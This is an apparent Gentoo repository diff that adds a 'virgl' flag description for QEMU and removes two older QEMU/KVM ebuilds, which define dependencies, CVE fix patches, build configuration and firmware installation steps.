<flag name="jpeg">Enable jpeg image support for the VNC console server</flag> <flag name="jpeg">Enable jpeg image support for the VNC console server</flag>
<flag name="png">Enable png image support for the VNC console server</flag> <flag name="png">Enable png image support for the VNC console server</flag>
<flag name="usb">Enable USB passthrough via <pkg>dev-libs/libusb</pkg></flag> <flag name="usb">Enable USB passthrough via <pkg>dev-libs/libusb</pkg></flag>
@ -42,6 +45,7 @@
<flag name="uuid">Enable UUID support in the vdi block driver</flag> <flag name="uuid">Enable UUID support in the vdi block driver</flag>
<flag name="vde">Enable VDE-based networking</flag> <flag name="vde">Enable VDE-based networking</flag>
<flag name="vhost-net">Enable accelerated networking using vhost-net, see http://www.linux-kvm.org/page/VhostNet</flag> <flag name="vhost-net">Enable accelerated networking using vhost-net, see http://www.linux-kvm.org/page/VhostNet</flag>
<flag name="virgl">Enable experimental Virgil 3d (virtual software GPU)</flag>
<flag name="virtfs">Enable VirtFS via virtio-9p-pci / fsdev. See http://wiki.qemu.org/Documentation/9psetup</flag> <flag name="virtfs">Enable VirtFS via virtio-9p-pci / fsdev. See http://wiki.qemu.org/Documentation/9psetup</flag>
<flag name="vte">Enable terminal support (<pkg>x11-libs/vte</pkg>) in the GTK+ interface</flag> <flag name="vte">Enable terminal support (<pkg>x11-libs/vte</pkg>) in the GTK+ interface</flag>
<flag name="xattr">Add support for getting and setting POSIX extended attributes, through <flag name="xattr">Add support for getting and setting POSIX extended attributes, through


@ -1,615 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="amd64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl selinux smartcard snappy spice ssh static static-softmmu \
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Require at least one softmmu or user target.
# Block USE flag configurations known to not work.
REQUIRED_USE="|| ( ${use_softmmu_targets} ${use_user_targets} )
${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
aio? ( dev-libs/libaio[static-libs(+)] )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
png? ( media-libs/libpng:0=[static-libs(+)] )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? ( >=media-libs/libsdl-1.2.11[static-libs(+)] )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( >=app-emulation/spice-0.12.0[static-libs(+)] )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r1[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.7.5
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
accessibility? ( app-accessibility/brltty )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
gtk? (
gtk2? ( x11-libs/gtk+:2 )
!gtk2? ( x11-libs/gtk+:3 )
x11-libs/vte:2.90
)
iscsi? ( net-libs/libiscsi )
opengl? ( virtual/opengl )
pulseaudio? ( media-sound/pulseaudio )
python? ( ${PYTHON_DEPS} )
sdl? ( media-libs/libsdl[X] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
spice? ( >=app-emulation/spice-protocol-0.12.3 )
systemtap? ( dev-util/systemtap )
usbredir? ( >=sys-apps/usbredir-0.6 )
virtfs? ( sys-libs/libcap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
src_prepare() {
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${P}-CVE-2015-3456.patch #549404
epatch "${FILESDIR}"/${P}-CVE-2015-3209.patch #551752
epatch "${FILESDIR}"/${P}-CVE-2015-5158.patch #555680
epatch "${FILESDIR}"/${P}-CVE-2015-3214.patch #556052
epatch "${FILESDIR}"/${P}-CVE-2015-5154-1.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-2.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-3.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5165-1.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-2.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-3.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-4.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-5.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-6.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-7.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5166.patch #556304
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir=$2
local static_flag="static-${buildtype}"
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls quorum)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu tls vnc-ws)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--target-list="${user_targets}"
--disable-blobs
--disable-tools
)
;;
softmmu)
conf_opts+=(
--disable-linux-user
--enable-system
--target-list="${softmmu_targets}"
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
;;
esac
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
einfo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
[[ -n ${softmmu_targets} ]] && \
einfo "Building the following softmmu targets: ${softmmu_targets}"
[[ -n ${user_targets} ]] && \
einfo "Building the following user targets: ${user_targets}"
if [[ -n ${softmmu_targets} ]]; then
mkdir "${S}/softmmu-build"
qemu_src_configure "softmmu" "${S}/softmmu-build"
fi
if [[ -n ${user_targets} ]]; then
mkdir "${S}/user-build"
qemu_src_configure "user" "${S}/user-build"
fi
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
ewarn "Migration from qemu-kvm instances and loading qemu-kvm created"
ewarn "save states has been removed starting with the 1.6.2 release"
ewarn
ewarn "It is recommended that you migrate any VMs that may be running"
ewarn "on qemu-kvm to a host with a newer qemu and regenerate"
ewarn "any saved states with a newer qemu."
ewarn
ewarn "qemu-kvm was the primary qemu provider in Gentoo through 1.2.x"
if use x86 || use amd64; then
ewarn
ewarn "The /usr/bin/kvm and /usr/bin/qemu-kvm wrappers are no longer"
ewarn "installed. In order to use kvm acceleration, pass the flag"
ewarn "-enable-kvm when running your system target."
fi
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version sys-firmware/seabios[binary]; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}


@ -1,616 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl selinux smartcard snappy spice ssh static static-softmmu \
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Require at least one softmmu or user target.
# Block USE flag configurations known to not work.
REQUIRED_USE="|| ( ${use_softmmu_targets} ${use_user_targets} )
${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
aio? ( dev-libs/libaio[static-libs(+)] )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
png? ( media-libs/libpng:0=[static-libs(+)] )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? ( >=media-libs/libsdl-1.2.11[static-libs(+)] )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( >=app-emulation/spice-0.12.0[static-libs(+)] )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r1[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.7.5
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
accessibility? ( app-accessibility/brltty )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
gtk? (
gtk2? ( x11-libs/gtk+:2 )
!gtk2? ( x11-libs/gtk+:3 )
x11-libs/vte:2.90
)
iscsi? ( net-libs/libiscsi )
opengl? ( virtual/opengl )
pulseaudio? ( media-sound/pulseaudio )
python? ( ${PYTHON_DEPS} )
sdl? ( media-libs/libsdl[X] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
spice? ( >=app-emulation/spice-protocol-0.12.3 )
systemtap? ( dev-util/systemtap )
usbredir? ( >=sys-apps/usbredir-0.6 )
virtfs? ( sys-libs/libcap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
